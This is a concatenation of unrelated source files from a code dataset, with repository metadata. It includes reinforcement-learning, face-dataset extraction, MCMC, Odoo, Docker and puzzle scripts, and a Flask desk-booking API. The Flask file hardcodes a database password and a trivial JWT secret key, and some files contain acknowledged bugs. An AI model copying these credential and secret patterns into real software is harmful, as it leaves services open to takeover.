train_durations[i_episode] = (t + 1)
discounted_rewards = agent.calculate_rewards(reward_ls)
agent.update(state_action_ls, discounted_rewards)
else:
eval_durations[i_episode] = (t + 1)
if check_termination(eval_durations):
logger.info('Solved after {} episodes.'.format(len(train_durations)))
break
plot_rewards(train_durations, eval_durations)
else:
logger.info("Unable to reach goal in {} training episodes.".format(len(train_durations)))
plot_rewards_completed(train_durations, eval_durations)
env.close()
plt.show()
| nikmand/Reinforcement-Learning-Algorithms | rlsuite/examples/cartpole/cartpole_monte_carlo.py | cartpole_monte_carlo.py | py | 2,631 | python | en | code | 0 | github-code | 90 |
40326631715 | #!/usr/bin/python3
# coding: utf-8
# 1,MS-Celeb-1M数据集:
# MSR IRC是目前世界上规模最大、水平最高的图像识别赛事之一,由MSRA(微软亚洲研究院)图像分析、大数据挖掘研究组组长张磊发起,每年定期举办。
# 从1M个名人中,根据他们的受欢迎程度,选择100K个。然后,利用搜索引擎,给100K个人,每人搜大概100张图片。共100K * 100 = 10M个图片。
# 测试集包括1000个名人,这1000个名人来自于1M个明星中随机挑选。而且经过微软标注。每个名人大概有20张图片,这些图片都是网上找不到的。
# 其他常用人脸数据集:CAISA - WebFace, VGG - Face, MegaFace.
#
# 数据有对齐版可以直接用于训练(共80G数据):
#
#
#
# 数据下载地址:https://hyper.ai/datasets/5543
#
# 2,FaceImageCroppedWithAlignment.tsv文件提取参考: https://www.twblogs.net/a/5ba2faf12b71771a4daa0c47/
#
# 下载并解压微软的大型人脸数据集MS-Celeb-1M后,将FaceImageCroppedWithAlignment.tsv文件还原成JPG图片格式。代码如下:
import base64
import struct
import os
def read_line(line):
    """Split one MS-Celeb-1M alignment record into its seven fields.

    Returns (m_id, image_search_rank, image_url, page_url, face_id, rect,
    face_bytes): rect is the face rectangle decoded into four floats, and
    face_bytes is the raw (JPEG) image data.
    """
    # NOTE(review): the source is a .tsv, whose fields are normally
    # tab-separated; splitting on a single space only works if the file was
    # pre-converted -- confirm the actual delimiter.
    m_id, image_search_rank, image_url, page_url, face_id, face_rectangle, face_data = line.split(" ")
    # The rectangle is four base64-encoded packed floats.
    rect = struct.unpack("ffff", base64.b64decode(face_rectangle))
    return m_id, image_search_rank, image_url, page_url, face_id, rect, base64.b64decode(face_data)
def write_image(filename, data):
    # Dump raw image bytes to disk, overwriting any existing file.
    with open(filename, "wb") as out:
        out.write(data)
def unpack(file_name, output_dir):
    """Stream the alignment TSV and write each face crop out as
    <output_dir>/<m_id>/<search_rank>-<face_id>.jpg (one folder per identity)."""
    i = 0
    with open(file_name, "r", encoding="utf-8") as f:
        for line in f:
            m_id, image_search_rank, image_url, page_url, face_id, face_rectangle, face_data = read_line(line)
            # One sub-directory per identity (m_id).
            img_dir = os.path.join(output_dir, m_id)
            if not os.path.exists(img_dir):
                os.mkdir(img_dir)
            img_name = "%s-%s" % (image_search_rank, face_id) + ".jpg"
            write_image(os.path.join(img_dir, img_name), face_data)
            i += 1
            if i % 1000 == 0:
                print(i, "images finished")
            # Demo only: stop after the first ~20 records. (The original
            # comment said 100 images, but the guard below triggers at i > 20.)
            if i > 20:
                break
    print("all finished")
def main():
file_name = "/media/gswyhq/000F3553000267F4/g_pan/MS-Celeb-1M/data/aligned_face_images/FaceImageCroppedWithAlignment.tsv"
output_dir = "/media/gswyhq/000F3553000267F4/g_pan/MS-Celeb-1M/test_data2"
unpack(file_name, output_dir)
# 提取后数据总共800多万张人脸图像:
#
#
#
# 3,其中同一目录图像有很多数据并非是同一人
#
# 网上有一份清理的文档 MS-Celeb-1M_clean_list.txt(包含79076个人,5049824张人脸图像)
if __name__ == '__main__':
main() | gswyhq/hello-world | deep-learning深度学习/解析MS-Celeb-1M人脸数据集及FaceImageCroppedWithAlignment.tsv文件提取.py | 解析MS-Celeb-1M人脸数据集及FaceImageCroppedWithAlignment.tsv文件提取.py | py | 2,773 | python | zh | code | 9 | github-code | 90 |
8008554697 | # -*- coding: utf-8 -*-
"""
Main program entrance: launches GUI application,
handles logging and status calls.
------------------------------------------------------------------------------
This file is part of h3sed - Heroes3 Savegame Editor.
Released under the MIT License.
@created 14.03.2020
@modified 20.03.2022
------------------------------------------------------------------------------
"""
import argparse
import gzip
import locale
import logging
import os
import sys
import threading
import traceback
import wx
from . lib import util
from . import conf
from . import guibase
from . import gui
logger = logging.getLogger(__package__)
ARGUMENTS = {
"description": conf.Title,
"arguments": [
{"args": ["-v", "--version"], "action": "version",
"version": "%s %s, %s." % (conf.Title, conf.Version, conf.VersionDate)},
{"args": ["FILE"], "nargs": "?",
"help": "Savegame to open on startup, if any"},
],
}
class MainApp(wx.App):
def InitLocale(self):
self.ResetLocale()
if "win32" == sys.platform: # Avoid dialog buttons in native language
mylocale = wx.Locale(wx.LANGUAGE_ENGLISH_US, wx.LOCALE_LOAD_DEFAULT)
mylocale.AddCatalog("wxstd")
self._initial_locale = mylocale # Override wx.App._initial_locale
# Workaround for MSW giving locale as "en-US"; standard format is "en_US".
# Py3 provides "en[-_]US" in wx.Locale names and accepts "en" in locale.setlocale();
# Py2 provides "English_United States.1252" in wx.Locale.SysName and accepts only that.
name = mylocale.SysName if sys.version_info < (3, ) else mylocale.Name.split("_", 1)[0]
locale.setlocale(locale.LC_ALL, name)
def except_hook(etype, evalue, etrace):
"""Handler for all unhandled exceptions."""
text = "".join(traceback.format_exception(etype, evalue, etrace)).strip()
log = "An unexpected error has occurred:\n\n%s"
logger.error(log, text)
if not conf.PopupUnexpectedErrors: return
msg = "An unexpected error has occurred:\n\n%s\n\n" \
"See log for full details." % util.format_exc(evalue)
wx.CallAfter(wx.MessageBox, msg, conf.Title, wx.OK | wx.ICON_ERROR)
def install_thread_excepthook():
    """
    Workaround for sys.excepthook not catching threading exceptions.

    @from https://bugs.python.org/issue1230540
    """
    # Monkey-patch Thread.__init__ so that every thread created afterwards
    # wraps its run() in a try/except that forwards uncaught exceptions to
    # sys.excepthook -- stock CPython routes thread exceptions elsewhere,
    # bypassing any application-level excepthook.
    init_old = threading.Thread.__init__
    def init(self, *args, **kwargs):
        init_old(self, *args, **kwargs)
        run_old = self.run
        # Replace the bound run() with a forwarding wrapper; this only
        # affects the instance being constructed.
        def run_with_except_hook(*a, **b):
            try: run_old(*a, **b)
            except Exception: sys.excepthook(*sys.exc_info())
        self.run = run_with_except_hook
    threading.Thread.__init__ = init
def patch_gzip_for_partial():
"""
Replaces gzip.GzipFile._read_eof with a version not throwing CRC error.
for decompressing partial files.
"""
def read_eof_py3(self):
self._read_exact(8)
# Gzip files can be padded with zeroes and still have archives.
# Consume all zero bytes and set the file position to the first
# non-zero byte. See http://www.gzip.org/#faq8
c = b"\x00"
while c == b"\x00":
c = self._fp.read(1)
if c:
self._fp.prepend(c)
def read_eof_py2(self):
# Gzip files can be padded with zeroes and still have archives.
# Consume all zero bytes and set the file position to the first
# non-zero byte. See http://www.gzip.org/#faq8
c = "\x00"
while c == "\x00":
c = self.fileobj.read(1)
if c:
self.fileobj.seek(-1, 1)
readercls = getattr(gzip, "_GzipReader", gzip.GzipFile) # Py3/Py2
readercls._read_eof = read_eof_py2 if readercls is gzip.GzipFile else read_eof_py3
def run_gui(filename):
"""Main GUI program entrance."""
global logger
# Set up logging to GUI log window
logger.addHandler(guibase.GUILogHandler())
logger.setLevel(logging.DEBUG)
patch_gzip_for_partial()
install_thread_excepthook()
sys.excepthook = except_hook
# Create application main window
app = MainApp(redirect=True) # stdout and stderr redirected to wx popup
window = gui.MainWindow()
app.SetTopWindow(window) # stdout/stderr popup closes with MainWindow
# Some debugging support
window.run_console("import datetime, math, os, re, time, sys, wx")
window.run_console("# All %s standard modules:" % conf.Title)
window.run_console("import h3sed")
window.run_console("from h3sed import conf, guibase, gui, images, "
"main, metadata, plugins, templates")
window.run_console("from h3sed.lib import controls, util, wx_accel")
window.run_console("")
window.run_console("self = wx.GetApp().TopWindow # Application main window")
if filename and os.path.isfile(filename):
wx.CallAfter(wx.PostEvent, window, gui.OpenSavefileEvent(-1, filename=filename))
app.MainLoop()
def run():
"""Parses command-line arguments and runs GUI."""
conf.load()
argparser = argparse.ArgumentParser(description=ARGUMENTS["description"])
for arg in ARGUMENTS["arguments"]:
argparser.add_argument(*arg.pop("args"), **arg)
argv = sys.argv[1:]
if "nt" == os.name: # Fix Unicode arguments, otherwise converted to ?
argv = util.win32_unicode_argv()[1:]
arguments, _ = argparser.parse_known_args(argv)
if arguments.FILE: arguments.FILE = util.longpath(arguments.FILE)
run_gui(arguments.FILE)
if "__main__" == __name__:
run()
| suurjaak/h3sed | src/h3sed/main.py | main.py | py | 5,800 | python | en | code | 1 | github-code | 90 |
def solution(numbers, hand):
    """Simulate two-thumb typing on a phone keypad (Programmers 'Keypad').

    Left-column keys (1/4/7) always use the left thumb, right-column keys
    (3/6/9) the right thumb; middle-column keys go to whichever thumb is
    closer (Manhattan distance), with ``hand`` breaking ties. Returns one
    'L'/'R' character per pressed number.
    """
    def distance(a, b):
        # Manhattan distance between two keypad coordinates.
        return abs(a[0] - b[0]) + abs(a[1] - b[1])

    # Keypad layout: key -> (row, col); '*' and '#' flank the 0 key.
    pos = {n: ((n - 1) // 3, (n - 1) % 3) for n in range(1, 10)}
    pos['*'], pos[0], pos['#'] = (3, 0), (3, 1), (3, 2)

    left, right = '*', '#'
    presses = []
    for num in numbers:
        if num in (1, 4, 7):
            use_left = True
        elif num in (3, 6, 9):
            use_left = False
        else:
            d_left = distance(pos[left], pos[num])
            d_right = distance(pos[right], pos[num])
            if d_left < d_right:
                use_left = True
            elif d_left > d_right:
                use_left = False
            else:
                use_left = (hand == 'left')
        if use_left:
            presses.append('L')
            left = num
        else:
            presses.append('R')
            right = num
    return ''.join(presses)
input = [7, 0, 8, 2, 8, 3, 1, 5, 7, 6, 2]
main_hand = "left`"
print(solution(input, "left")) | jinhyung-noh/algorithm-ps | Programmers/level1/20210608_Keypad.py | 20210608_Keypad.py | py | 1,175 | python | en | code | 0 | github-code | 90 |
8569287954 | from torch import nn
import torch
if __name__=='__main__':
from utils import clones
else:
from .utils import clones
import torch.nn.functional as F
class MmFall(nn.Module):
    """Fully-connected binary classifier head for fall detection.

    Maps a 96-dimensional feature vector through a stack of linear layers
    (96 -> 160 -> 320 -> 160 -> 40 -> 10 -> 1) and squashes the final logit
    with a sigmoid, yielding a probability in (0, 1).

    NOTE(review): there is no activation between the linear layers, so the
    stack collapses to a single affine map -- confirm whether ReLUs were
    intended between p1..p6.
    """
    def __init__(self):
        super(MmFall, self).__init__()
        self.p1 = nn.Linear(96, 160)
        self.p2 = nn.Linear(160, 320)
        self.p3 = nn.Linear(320, 160)
        self.p4 = nn.Linear(160, 40)
        self.p5 = nn.Linear(40, 10)
        self.p6 = nn.Linear(10, 1)

    def forward(self, x):
        out = self.p1(x)
        out = self.p2(out)
        out = self.p3(out)
        out = self.p4(out)
        out = self.p5(out)
        out = self.p6(out)
        # torch.sigmoid replaces the deprecated F.sigmoid; numerically identical.
        return torch.sigmoid(out)
def make_model(
):
    "Helper: Construct a model from hyperparameters."
    # c = copy.deepcopy
    # attn = MultiHeadedAttention(head, d_model)
    # ff = ConvFeedForward(d_model, d_ff, kernel_size=5, dropout=dropout)
    # NOTE(review): SkeFall is neither defined nor imported in this module
    # (only MmFall is declared above), so calling make_model() raises
    # NameError -- confirm whether MmFall was intended here.
    model = SkeFall()
    # # This was important from their code.
    # # Initialize parameters with Glorot / fan_avg.
    # Xavier-initialise every weight matrix; 1-D params (biases) are skipped.
    for p in model.parameters():
        if p.dim() > 1:
            nn.init.xavier_uniform_(p)
    return model
30750226333 | import matplotlib
matplotlib.use("Agg")
import numpy
import os
my_home = os.popen("echo $HOME").readlines()[0][:-1]
from sys import path,argv
path.append('%s/work/mylib/'%my_home)
from Fourier_Quad import Fourier_Quad
from plot_tool import Image_Plot
import emcee
import corner
import time
import matplotlib.pyplot as plt
from multiprocessing import Pool
import h5py
def ln_gh_prior(theta):
    # Flat (uniform) prior: log-probability 0 inside the box |a_i| < 0.1 for
    # all five polynomial coefficients, -inf outside it.
    a1, a2, a3, a4, a5 = theta
    if all(-0.1 < coeff < 0.1 for coeff in (a1, a2, a3, a4, a5)):
        return 0.0
    return -numpy.inf
def ln_prob(theta, G, bins, bin_num2, inverse, x, x2, x3, x4, signal_num):
    """Log-posterior for the 4th-order polynomial signal model.

    theta: (a1..a5) polynomial coefficients; G: per-signal measurement
    arrays (signal_num rows); bins: shared histogram bin edges; bin_num2:
    half the bin count; inverse: reversed index range selecting the left
    histogram half mirrored; x, x2, x3, x4: precomputed coordinate powers.
    """
    lp = ln_gh_prior(theta)
    if not numpy.isfinite(lp):
        return -numpy.inf
    else:
        a1, a2, a3, a4, a5 = theta
        # Subtract the candidate polynomial; a correct model leaves G_h
        # symmetric about zero.
        G_h = G - a1 - a2*x - a3*x2 - a4*x3 - a5*x4
        xi = 0
        for i in range(signal_num):
            num = numpy.histogram(G_h[i], bins)[0]
            n1 = num[0:bin_num2][inverse]
            n2 = num[bin_num2:]
            # Chi-square between mirrored histogram halves: measures the
            # residual asymmetry penalised by the likelihood.
            xi += numpy.sum((n1 - n2) ** 2 / (n1 + n2))*0.5
        return lp - xi
def result_fun(params, coord):
    """Evaluate the fitted polynomial and its symmetric 1-sigma error at coord.

    params: sequence of (value, err_plus, err_minus) triples, one per power
            of ``coord`` starting at coord**0.
    """
    value, sigma = 0, 0
    for power, (best, err_hi, err_lo) in enumerate(params):
        basis = coord ** power
        value += best * basis
        sigma += (err_hi + err_lo) / 2 * basis
    return value, sigma
# a1 = -0.02
# a2 = -0.02
# a3 = 0.05
a1 = -0.035
a2 = 0.01
a3 = 0.02
a4 = 0
a5 = 0
num = int(argv[1])
ncpus = int(argv[2])
signal_num = 15
nwalkers = 300
ndim = 5
step = 600
print("Walker: %d. Step: %d."%(nwalkers, step))
fq = Fourier_Quad(10, 112)
bin_num = 8
bin_num2 = int(bin_num / 2)
x = numpy.linspace(-1, 1, signal_num).reshape((signal_num, 1))
x2 = x*x
x3 = x*x*x
x4 = x*x*x*x
signals = a1 + a2*x + a3*x2 + a4*x3 + a5*x4
parameters = [a1, a2, a3, a4, a5]
print("Signals: ", signals[:,0],".\n%.4f + %.4f*x + %.4f*x^2 + %.4f*x^3 + %.4f*x^4"%(a1,a2,a3, a4, a5))
ellip = numpy.zeros((signal_num, num))
img = Image_Plot()
img.subplots(1,1)
fq_shear = numpy.zeros((2,signal_num))
for i in range(signal_num):
# rng = numpy.random.RandomState(i+1)
# ellip[i] = rng.normal(signals[i,0], 0.3, num)
ellip[i] = numpy.random.normal(signals[i,0], 0.3, num)
# noise = rng.normal(0, numpy.abs(ellip[i])/5)
# ellip[i] += noise
t1 = time.time()
gh, gh_sig = fq.fmin_g_new(ellip[i], numpy.ones_like(ellip[i]), 8)[:2]
fq_shear[0, i] = gh
fq_shear[1, i] = gh_sig
t2 = time.time()
print("signal:[%.4f at %.4f] %.4f (%.4f) [%d gal], Time: %.2f sec"%(signals[i,0], x[i,0], gh, gh_sig, num, t2-t1))
img.axs[0][0].hist(ellip[i], 100, histtype="step", label="%.4f" % signals[i])
img.save_img("./pic/data_hist.png")
# img.show_img()
img.close_img()
# find the signal
all_ellip = ellip.reshape((num*signal_num,))
ellip_bins = fq.set_bin(all_ellip, 8, 1.5)
inverse = range(bin_num2 - 1, -1, -1)
print("Bins:", ellip_bins)
p0 = numpy.random.uniform(-0.02, 0.02, ndim*nwalkers).reshape((nwalkers, ndim))
t1 = time.time()
with Pool(ncpus) as pool:
sampler = emcee.EnsembleSampler(nwalkers, ndim, ln_prob, args=[ellip, ellip_bins, bin_num2, inverse, x, x2, x3, x4, signal_num],pool=pool)
t2 = time.time()
pos, prob, state = sampler.run_mcmc(p0, step)
t3 = time.time()
print("Time: %.2f sec, %2.f sec"%(t2-t1, t3-t2))
img = Image_Plot(fig_x=16, fig_y=4)
img.subplots(ndim,1)
for i in range(nwalkers):
for j in range(ndim):
img.axs[j][0].plot(range(step),sampler.chain[i, :, j], color='grey',alpha=0.6)
img.axs[j][0].plot([0,step], [parameters[j], parameters[j]])
img.save_img("./pic/mcmc_walkers_nw_%d_stp_%d.png"%(nwalkers, step))
img.close_img()
samples = sampler.chain[:, 150:, :].reshape((-1, ndim))
print(samples.shape)
corner_fig = plt.figure(figsize=(10, 10))
fig = corner.corner(samples, labels=["$a_1$", "$a_2$", "$a_3$", "$a_4$", "$a_5$"], truths=[a1, a2, a3, a4, a5],
quantiles=[0.16, 0.5, 0.84], show_titles=True, title_fmt=".4f", title_kwargs={"fontsize": 12})
fig.savefig("./pic/mcmc_panel_nw_%d_stp_%d.png"%(nwalkers, step))
fit_params = []
pr = numpy.percentile(samples, [16, 50, 84], axis=0)
for i in range(ndim):
fit_params.append([pr[1,i], pr[2,i]-pr[1,i], pr[1,i]-pr[0,i]])
fit_params_ = map(lambda v: (v[1], v[2] - v[1], v[1] - v[0]),zip(*numpy.percentile(samples, [16, 50, 84], axis=0)))
print(fit_params)
for para in fit_params_:
print("%8.5f [%8.5f, %8.5f]"%(para[0], para[1], para[2]))
mcmc_shear, mcmc_sig = result_fun(fit_params, x)
result = numpy.zeros((6, signal_num))
result[0] = x[:,0]
result[1] = signals[:,0]
result[2] = fq_shear[0]
result[3] = fq_shear[1]
result[4] = mcmc_shear[:,0]
result[5] = mcmc_sig[:,0]
h5f = h5py.File("./result.hdf5","w")
h5f["/chain"] = sampler.chain
h5f["/result"] = result
h5f.close()
img = Image_Plot()
img.subplots(1,2)
img.axs[0][0].plot(x, signals, color='k', label="True")
img.axs[0][0].errorbar(x, mcmc_shear,mcmc_sig, label="MCMC Recovered")
img.axs[0][0].errorbar(x, fq_shear[0], fq_shear[1], label="FQ Recovered")
img.set_label(0,0,0, "g")
img.set_label(0,0,1, "X")
img.axs[0][0].legend()
img.axs[0][1].plot(x, 100*(signals[:,0] - mcmc_shear[:,0]), label="MCMC: True - Recovered")
img.axs[0][1].plot(x, 100*(signals[:,0] - fq_shear[0]), label="FQ: True - Recovered")
img.set_label(0,1,0, "$10^2 \\times\Delta g$")
img.set_label(0,1,1, "X")
img.axs[0][1].legend()
img.subimg_adjust(0, 0.25)
img.save_img("./pic/mcmc_recover_nw_%d_stp_%d.png"%(nwalkers, step))
img.close_img()
# for i in range(ndim):
# img = Image_Plot()
# img.subplots(1, 1)
# img.axs[0][0].hist(sampler.flatchain[:, 0], 100, histtype="step", color='k')
# img.save_img("mcmc_chisq.png")
# # img.show_img()
# img.close_img()
# pool.close() | hekunlie/astrophy-research | galaxy-galaxy lensing/mass_mapping/MCMC/MCMC.py | MCMC.py | py | 5,707 | python | en | code | 2 | github-code | 90 |
43333927906 | #!/usr/bin/env python3
import sys
import re
def parse(f):
    """Read particle descriptions, one per line, from the iterable *f*.

    Every line must contain nine integers (px,py,pz, vx,vy,vz, ax,ay,az);
    the coordinates are accumulated into three flat lists which are
    returned as (positions, velocities, accelerations).
    """
    positions, velocities, accelerations = [], [], []
    for line in f:
        values = [int(tok) for tok in re.findall(r'-?[0-9]+', line)]
        positions.extend(values[:3])
        velocities.extend(values[3:6])
        accelerations.extend(values[6:])
    return positions, velocities, accelerations
def closest_after_steps(p, v, a, steps):
    """Simulate *steps* ticks and return the index of the particle that ends
    up closest to the origin (Manhattan distance).

    The flat coordinate lists p and v are not modified; a is read-only.
    """
    pos = list(p)
    vel = list(v)
    for _ in range(steps):
        for i, acc in enumerate(a):
            vel[i] += acc
            pos[i] += vel[i]
    # Manhattan distance per particle (three consecutive coordinates each).
    distances = [abs(pos[i]) + abs(pos[i + 1]) + abs(pos[i + 2])
                 for i in range(0, len(pos), 3)]
    return distances.index(min(distances))
def not_collided_after_steps(p, v, a, steps):
    """Simulate *steps* ticks, removing any group of particles that share a
    position after a tick, and return how many particles survive.

    Collided particles are frozen in place and excluded from all further
    updates and collision checks, matching removal from the simulation.
    The inputs p and v are not modified.
    """
    pos = list(p)
    vel = list(v)
    n = len(pos) // 3
    dead = set()  # indices (0..n-1) of particles that have collided
    for _ in range(steps):
        # Advance only the particles that are still alive.
        for k in range(n):
            if k in dead:
                continue
            base = 3 * k
            for off in range(3):
                vel[base + off] += a[base + off]
                pos[base + off] += vel[base + off]
        # Group live particles by position; any shared position is a crash.
        occupied = {}
        for k in range(n):
            if k in dead:
                continue
            occupied.setdefault(tuple(pos[3 * k:3 * k + 3]), []).append(k)
        for group in occupied.values():
            if len(group) > 1:
                dead.update(group)
    return n - len(dead)
# part 1
p, v, a = parse(sys.stdin)
print(closest_after_steps(p, v, a, 500))
# part 2
print(not_collided_after_steps(p, v, a, 500))
| taddeus/advent-of-code | 2017/20_particles.py | 20_particles.py | py | 1,400 | python | en | code | 2 | github-code | 90 |
9534766616 | # -*- coding: utf-8 -*-
from odoo import models, fields, api, _
class account_payment(models.Model):
_inherit = "account.payment"
check_amount_in_words_ec = fields.Char(string='Importe en letras', compute='_compute_importe_letras')
    @api.one
    @api.depends('check_amount_in_words')
    def _compute_importe_letras(self):
        # Build the Spanish-style amount-in-words: keep the words before the
        # English " and " separator, then append the cents as "con NN/100".
        # NOTE(review): assumes check_amount_in_words is a non-empty string;
        # a None value would raise AttributeError here -- confirm upstream.
        text = self.check_amount_in_words.split(' and ')[0]
        self.check_amount_in_words_ec = text + ' con ' + str(int((self.amount-int(self.amount))*100)) + '/100'
    @api.multi
    def do_print_checks(self):
        # Use the Ecuadorian check report when the journal's company is in EC
        # (or when forced via the account_check_printing_force_ec_format
        # system parameter); otherwise fall back to the standard behavior.
        if self:
            check_layout = self[0].company_id.account_check_printing_layout
            # A config parameter is used to give the ability to use this check format even in other countries than US, as not all the localizations have one
            if check_layout != 'disabled' and (self[0].journal_id.company_id.country_id.code == 'EC' or bool(self.env['ir.config_parameter'].sudo().get_param('account_check_printing_force_ec_format'))):
                # Mark the payments as sent before rendering the check report.
                self.write({'state': 'sent'})
                return self.env.ref('l10n_ec_check_printing.%s' % check_layout).report_action(self)
        return super(account_payment, self).do_print_checks()
move_line_rel_ids = fields.Many2many('account.move.line', 'payment_move_line_rel','payment_id','move_line_id', compute='_compute_move_line_rel_ids')
@api.depends('reconciled_invoice_ids')
def _compute_move_line_rel_ids(self):
move_lines = []
for payment in self:
print(payment.reconciled_invoice_ids)
for inv in payment.reconciled_invoice_ids:
move_ids = []
for reconcile in inv.payment_move_line_ids:
move_ids += [reconcile.move_id.id]
pml = self.env['account.move.line'].search([('move_id', 'in', move_ids)])
for pmt_move_line in pml:
# Valida si es una retefuente
if pmt_move_line.credit >0:
move_lines += [pmt_move_line.id]
self.move_line_rel_ids = move_lines | pragmatic-dev/l10n_ec_check_printing | l10n_ec_check_printing/models/account_payment.py | account_payment.py | py | 2,092 | python | en | code | 0 | github-code | 90 |
13631878719 | import docker
from docker.errors import NotFound
def remove_containers(containers):
    """Stop and force-remove each named container; names that no longer
    exist are reported and skipped."""
    client = docker.from_env()
    for name in containers:
        try:
            target = client.containers.get(name)
            target.stop()
            target.remove(force=True)
        except NotFound:
            print(f'Container {name} already removed')
| mskvn/scoring_api | tests/integration/docker_utils.py | docker_utils.py | py | 404 | python | en | code | 0 | github-code | 90 |
38043773980 | from flask import Flask, jsonify, session, request, redirect, abort, make_response
from flask_restful import Resource, Api
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import or_
from flask_cors import CORS, cross_origin
import uuid
from werkzeug.security import generate_password_hash, check_password_hash
import jwt
import datetime
from functools import wraps
import json
import os
import random
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://user:CiaoCiao88@localhost:3306/appprenotascrivanie'
app.config['SECRET_KEY'] = 'SECRET'
app.secret_key = 'superSecretKey'
SESSION_USERID = None
db = SQLAlchemy(app)
api = Api(app)
CORS(app)
USERLOGGED = False
# - fase di login (utente + password + reset password via mail)
# - TODO: resetPassword()
# DB MODELS
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
public_id = db.Column(db.String(50), unique=True)
username = db.Column(db.String(50))
email = db.Column(db.String)
password = db.Column(db.String)
id_ruolo = db.Column(db.Integer)
attivo = db.Column(db.Boolean)
class Prenotazione(db.Model):
__tablename__ = 'prenotazione'
id = db.Column(db.Integer, primary_key=True)
numero_prenotazione = db.Column(db.Integer)
id_utente = db.Column(db.Integer)
data = db.Column(db.Date)
ora_inizio = db.Column(db.Time)
ora_fine = db.Column(db.Time)
id_postazione = db.Column(db.Integer)
class Postazione(db.Model):
__tablename__ = 'postazione'
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String)
id_piano = db.Column(db.Integer)
class Ruolo(db.Model):
__tablename__ = 'ruolo'
id = db.Column(db.Integer, primary_key=True)
ruolo = db.Column(db.String)
def token_required(f):
    """Decorator: require a valid JWT in the 'x-access-token' request header.

    Decodes the token with the app SECRET_KEY, loads the matching User by
    its public_id and passes it to the wrapped view as the first argument
    (current_user).
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        token = None
        # Check whether the x-access-token header is present.
        if 'x-access-token' in request.headers:
            token = request.headers['x-access-token']
        if not token:
            # NOTE(review): this branch returns HTTP 200 while the invalid
            # token case below returns 401 -- confirm whether that is intended.
            return jsonify({'message':'token is missing'})
        try:
            data = jwt.decode(token, app.config['SECRET_KEY'])
            current_user = User.query.filter_by(public_id=data['public_id']).first()
        # NOTE(review): bare except also hides unrelated errors (e.g. DB
        # failures) behind the 'token is invalid' response.
        except:
            return jsonify({'message': 'token is invalid'}), 401
        return f(current_user, *args, **kwargs)
    return decorated
# ROUTES
@app.route('/user', methods=['POST'])
@token_required
def signIn(current_user):
    """Create a new user from the JSON body (username, email, password, ruolo)."""
    data = request.get_json()
    # Store only a salted SHA-256 hash of the password, never the plain text.
    hashed_password = generate_password_hash(data['password'], method='sha256')
    # NOTE(review): no duplicate username/email check is performed here --
    # confirm uniqueness is enforced elsewhere (e.g. at the DB level).
    newUser = User(public_id=str(uuid.uuid4()), username=data['username'], email=data['email'], password=hashed_password, id_ruolo=data['ruolo'], attivo=1)
    db.session.add(newUser)
    db.session.commit()
    return jsonify({'message': 'new user created'})
@app.route('/users', methods=['GET'])
@token_required
def getAllUsers(current_user):
    """Return every user's id, username, email and role as JSON."""
    users = [
        {'id': u.id, 'username': u.username, 'email': u.email, 'ruolo': u.id_ruolo}
        for u in User.query.all()
    ]
    return jsonify({'users': users})
# @app.route('/user-reservations', methods=['GET'])
# @token_required
# def getUserReservations(current_user):
# userReservations = Prenotazione.query.filter(Prenotazione.id_utente == current_user.id).all()
# output = []
# for reservation in userReservations:
# reservation_data = {}
# reservation_data['id'] = reservation.id
# reservation_data['numero_prenotazione'] = reservation.numero_prenotazione
# reservation_data['data'] = str(reservation.data)
# reservation_data['ora_inizio'] = str(reservation.ora_inizio)
# reservation_data['ora_fine'] = str(reservation.ora_fine)
# reservation_data['id_postazione'] = reservation.id_postazione
# output.append(reservation_data)
# return jsonify({'reservations': output})
@app.route('/user-reservations', methods=['GET'])
@token_required
def getUserReservations(current_user):
    """Return the logged-in user's reservations grouped by booking number.

    Each entry carries the booking number, the list of desk ids booked under
    it, and the id/date/start/end taken from the last row read for that
    booking.
    """
    userReservationsNumber = db.engine.execute('SELECT distinct numero_prenotazione FROM prenotazione WHERE id_utente = %s', current_user.id)
    output = []
    for reservationNumber in userReservationsNumber:
        res_data = {}
        res_data['numero_prenotazione'] = str(reservationNumber[0])
        res_data['postazioni'] = []
        # Collect every row (one per desk) belonging to this booking number.
        queryPostazioni = db.engine.execute('SELECT * FROM prenotazione WHERE numero_prenotazione = %s', reservationNumber)
        for postazione in queryPostazioni:
            res_data['id'] = postazione.id
            res_data['postazioni'].append(str(postazione.id_postazione))
            res_data['ora_inizio'] = str(postazione.ora_inizio)
            res_data['ora_fine'] = str(postazione.ora_fine)
            res_data['data'] = str(postazione.data)
        output.append(res_data)
    # NOTE(review): this debug loop iterates a result proxy that the loop
    # above has already consumed, so it most likely prints nothing --
    # confirm and consider removing.
    for resNumb in userReservationsNumber:
        print(resNumb)
    return jsonify({'reservations': output})
@app.route('/postazioni', methods=['POST'])
@token_required
def getPostazioniOccupate(current_user):
    """List desks already booked in the requested date/time slot.

    Expects a JSON body with dataPrenotazione, oraInizio and oraFine.
    """
    data = request.get_json()
    # Fetch all reservations/desks occupied on that day within the requested
    # time slot: a reservation overlaps when it starts before data['oraFine']
    # or ends after data['oraInizio'].
    # KNOWN BUG (from the original author's note): the query also selects
    # reservations that end exactly at the time the new reservation starts,
    # because between() is inclusive at both ends.
    prenotazioniDelGiorno = Prenotazione.query.filter(
        Prenotazione.data == data['dataPrenotazione'],
        or_(Prenotazione.ora_inizio.between(data['oraInizio'], data['oraFine']),Prenotazione.ora_fine.between(data['oraInizio'], data['oraFine'])))
    output = []
    for prenotazione in prenotazioniDelGiorno:
        prenotazione_data = {}
        prenotazione_data['id_utente'] = prenotazione.id_utente
        prenotazione_data['id_postazione'] = prenotazione.id_postazione
        prenotazione_data['data'] = str(prenotazione.data)
        prenotazione_data['ora_inizio'] = str(prenotazione.ora_inizio)
        output.append(prenotazione_data)
    return jsonify({'postazioni':output})
@app.route('/prenotazione', methods=['POST'])
@token_required
def addPrenotazione(current_user):
    """Create one reservation (base users, role 3) or a multi-desk
    reservation (other roles) from the JSON body.

    Body fields: dataPrenotazione, oraInizio, oraFine, postazione (a single
    desk id for base users, a list of desk ids otherwise).
    """
    data = request.get_json()
    print(data)
    if data['dataPrenotazione'] == '' or data['oraInizio'] == '' or data['oraFine'] == '':
        return jsonify({'error': 'Devi selezionare una data e un orario validi per prenotare'})
    # Generate one booking number shared by all rows of this reservation,
    # whether it covers a single desk or several.
    # NOTE(review): random.randint(1,21)*random.randint(1,21) yields at most
